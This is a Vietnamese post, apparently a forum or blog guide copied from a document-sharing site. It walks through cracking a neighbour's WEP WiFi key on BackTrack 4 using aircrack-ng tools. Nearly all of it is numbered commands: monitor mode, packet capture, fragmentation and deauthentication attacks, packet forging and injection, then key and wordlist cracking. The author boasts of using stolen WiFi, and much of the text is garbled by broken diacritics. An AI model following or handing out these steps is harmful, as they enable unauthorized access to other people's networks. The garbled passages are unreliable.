tổng hợp hack wifi
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (170.25 KB, 4 trang )
TỔNG HỢP HACK WIFI
Hack pass wifi WEP key with Fragment no client
đăng 23:21 08-04-2011 bởi vuong truong [ đã cập nhật 23:46 08-04-2011 ]
Có thể nói hack pass Wifi là đề tài muôn thuở và mình đang online với các bạn cũng bằng wifi lậu đây.
Nói là lậu nhưng "key xịn", hehehe. Thôi không dài dòng nữa, topic hack password dạng Wepkey thì có
nhiều rồi nhưng hướng dẫn dùng kỹ thuật Fragment để hack thì chưa có 1 topic đàng hoàng nào nói tới.
Bởi vậy, hôm nay Lãng tử xin mạo muội hướng dẫn các bạn dùng Fragment để hack pass Wepkey,
không cần client
Nói đến đây chắc các bạn nào mới tập tành hack pass wifi sẽ không hiểu. Không sao, mình sẽ hướng dẫn
từ đầu cho các bạn nào "mới vào nghề" luôn:
Phần 1: Giới thiệu và hướng dẫn về BackTrack
Tóm t t ph n 1 cho nh ng ai l i đ c:ắ ầ ữ ườ ọ
Công c c n dùng:ụ ầ
- Phần mềm BackTrack 4 (BT4), download tại đây: />USB (dung lượng tùy vào bản bạn down) hoặc đĩa DVD để burn file .iso vừa down về
- Phần mềm burn file .iso về đĩa DVD (nếu muốn boot bằng USB thì khỏi cần cái này)
Hướng dẫn boot BT4 bằng USB: (Mình đã test với bản BT4 beta và USB 1GB)
Các bạn giải nén file .iso vừa down về (dùng Ultra Iso hoặc Winrar) sẽ được 2 folder là boot và BT4.
Copy 2 folder này vào USB
Sau đó vào ổ USB -> Vào boot -> Vào bootinst.bat. Ta sẽ được:
Bấm phím bất kỳ, ta sẽ được:
Bấm phím bất kỳ để hoàn thành.
Vậy là "đồ nghề" đã xong ta tiến hành boot với USB hoặc đĩa DVD. Bạn nào chưa chỉnh thứ tự ưu tiên
boot thì vào BIOS chỉnh lại nhé, để ổ USB và DVD lên trên ổ cứng. Ta tiến hành boot để vào BT4:
Cắm USB vào và bật máy tính, cứ để cho nó tự chạy. Đến khi nó đòi log on thì:
-User: root
-Pass: toor (Lưu ý có nhiều máy khi gõ pass sẽ không hiển thị gì hết, bạn yên tâm cứ việc gõ, mặc kệ nó
có hiển thị hay không)
Ti p theo ta gõ:ế startx
Vậy là vào được BT4 rồi đó. Mở 1 Shell (biểu tượng ô vuông màu đen ở góc trái dưới cùng đó) và làm
theo các bước sau
Các b n có th làm theo h ng d n nh trongạ ể ướ ẫ ư tài liệu sau. Hoặc dùng thẳng kỹ
thuật Fragment ở phần 2 sẽ bảo đảm chắc chắn hack được pass Wepkey
Phần 2: Hướng dẫn kỹ thuật Fragment
Tại sao phải cần đến kỹ thuật này?
- Vì chúng ta cần 1 máy victim đang kết nối với BSSID cần hack mà victim không có (chờ mãi mà không
có ai truy cập).
- Có máy victim nhưng chỉ chat thôi hay sao ấy, data không tăng hoặc tăng rất chậm, chờ cả ngày mà
chẳng đủ 2500 Ivs, nói chi có thể phải cần hơn thế nữa
Và 1 vài nguyên nhân khác
Nếu bạn đang hack mà rơi vào các trường hợp trên hãy khởi động lại Back Track và dùng Fragment
Các bước thực hiện:
Phần trong ngoặc đơn () là chú thích nhé
B c 1: M 1 Shell và gõướ ở
airmon-ng
B c 2:ướ airmon-ng start wlan0 ( đây card wireless c a mình là wlan0)ở ủ
B c 3:ướ airodump-ng
B c 4:ướ airodump-ng mon0 (đã chuy n sang ch đ monitor)ể ế ộ
B c 5:ướ airodump-ng bssid {đ a ch MAC c a BSSID c n hack} channel ị ỉ ủ ầ
{channel c a BSSID c n hack} ivs -w capturefile mon0ủ ầ (capturefile là tên c a ủ
file mà data đ c l u vào, b n có th đi n tên gì c ng đ c nh ng đ n b c cu i ượ ư ạ ể ề ũ ượ ư ế ướ ố
nh vi t đúng tên file này nhé )ớ ế
B c 6: M 1 shell khác và gõ:ướ ở
aireplay-ng -5 -b {đ a ch MAC c a BSSID c n hack} mon0ị ỉ ủ ầ (-5 chính là fragment
đó các b n)ạ
Ch 1 tý và ch n Yes, gõ ch "y" đó.ờ ọ ữ
B c 7: M 1 Shell khácướ ở
aireplay-ng -1 1 -a {đ a ch MAC c a BSSID c n hack} mon0ị ỉ ủ ầ
B m Ctrl + Cấ
Quay l i Shell th 2 b n s th y xu t hi n file có d ngạ ứ ạ ẽ ấ ấ ệ ạ .xor (Có là ta đã thành công
r i đó)ồ
B c 8: V n Shell th 2 nhéướ ẫ ở ứ
packetforge-ng -0 -a {đ a ch MAC c a BSSID c n hack} -h 00:11:22:33:44:55 -k ị ỉ ủ ầ
255.255.255.255 -l 255.255.255.255 -y fragment- {tênfile.xor} -w arpy
B c 9:ướ aireplay-ng -3 -r arpy -b {đ a ch MAC c a BSSID c n hack} mon0ị ỉ ủ ầ
N u th y data t ng vù vù thì ch c ch n 99,99% ta đã thành công và pass đã hack ế ấ ă ắ ắ
đ c r i đóượ ồ
B c 10: ây là b c cu i cùng dùng đ b khóa l ng data mà ta thu vướ Đ ướ ố ể ẻ ượ ề
aircrack-ng -b {đ a ch MAC c a BSSID c n hack} capturefile*.ivsị ỉ ủ ầ
Xong r i đó, l p l i b c này n u BT yêu c u c n thêm data b n nhéồ ậ ạ ướ ế ầ ầ ạ
Và cu i cùng là là ta đã có pass sau bao ngày ch đ i ch còn gì n a. ố ờ ợ ứ ữ
Hahaahahaaaa s ng quá đi m t aaaaaaaaaaướ ấ
MORE 2
Đến bước 3 -> 4
+ ctrl c
1. airodump-ng –c chanel –w capturefilename mon0
new 2
+ aireplay-ng -0 1 –c essid mon0
+ aireplay-ng -0 1 –c station –c bssid mon0
New 2 or 3
Xem new đầu tiên, sau đó qua new 2 or new 3
+ dir
+ aircrack-ng –w /Desktop/test.lst capturefilename.cap
Nếu không đúng tên thì:
Mở new
Aircrack-ng –w /Desktop/test.lst capturefilename-01.cap (hoặc chép tên filename)
